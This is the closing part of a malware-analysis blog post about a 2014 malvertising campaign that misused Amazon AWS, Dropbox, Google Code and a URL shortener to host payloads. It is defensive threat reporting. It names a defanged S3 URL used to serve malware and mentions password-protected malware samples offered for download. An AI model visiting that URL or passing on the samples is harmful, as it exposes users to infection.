Registrar: FBS Inc.
Registrar IANA ID: 1110
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +902163299393
Domain Status: clientTransferProhibited

URL of the ICANN WHOIS Data Problem Reporting System:
>>>Last update of WHOIS database: 2014-03-08T19:18:12+0000Z<<<
Registration Service Provided By: WWW.ISIMTESCIL.NET


How to conclude this matter generally? Obviously the public well-known internet services was targeted to spread this infection. Let me describe how many of those abused services spotted in this single case:
Number one, (property of Amazon AWS) is utilised by this actor for the etc bad purpose scheme (see the mobile link and Opera browser link on the above explanation, whatever it is, is not a good thing), we'd better warn Amazon AWS for this link.
Number two is, (property of Dropbox, Inc) is also utilised to serve payload malware.
Is that all? No. Number three: see the domain in payload URL,, it is the abuse of Google Code's SVN facility.
More? Yes, the last one, number four, service, the Google ShortURL is also abused to hide the URL of the malware payload.

The Google code is being abused to serve malware payloads of this threat's series for quite a while, you can view the reports posted by our friend ‏@sarimura (twitter) to the Project Hosting on Google Code in Google groups-->[here]. It shows how persistent the malware actor to always create a new google project and to use its download URL to serve the malware payloads. On the other hand it shows that the bad actor(s) is leaving many traces in Google Code servers during uploading the payloads (account ID, IP addresses, etc).. a hint to follow isn't it?


I share all sample, under usual password, click the picture below to download:

Moral of the story: Our beloved internet and its services are badly abuse by malware. Stay safe please!
PS: Comments and additional are to be added in follow up section! And it looks like this threat is bigger than expected so I could't sleep again, gotta go to day work now!

Updates: How bad the abuse & this malvertisement is?

The bad actor is keep on changing users in AmazonAWS and Google code to serve the next malicious payload.The new abused AmazonAWS page is:
unluvideolari.s3.amazonaws .com/unlu.html URLQuery-->[link]

PoC of how bad the malware download is:

Another PoC:

The recent Google Code SVN that's being abused:

Google set a good work-around by 401 authentication:

Or the 403:

Now Emerging Threat is releasing a signature that can be used to identify this malware download:

Update Info Credit: @sarimura (twitter), signature: Emerging Threat & @node5 (twitter), test & checks: @urlquery (twitter), thank's to Google to keep on nuking down the bad accounts and nice stats of the sort URL.

Follow Up

Great follow, thank's for always fast in responses!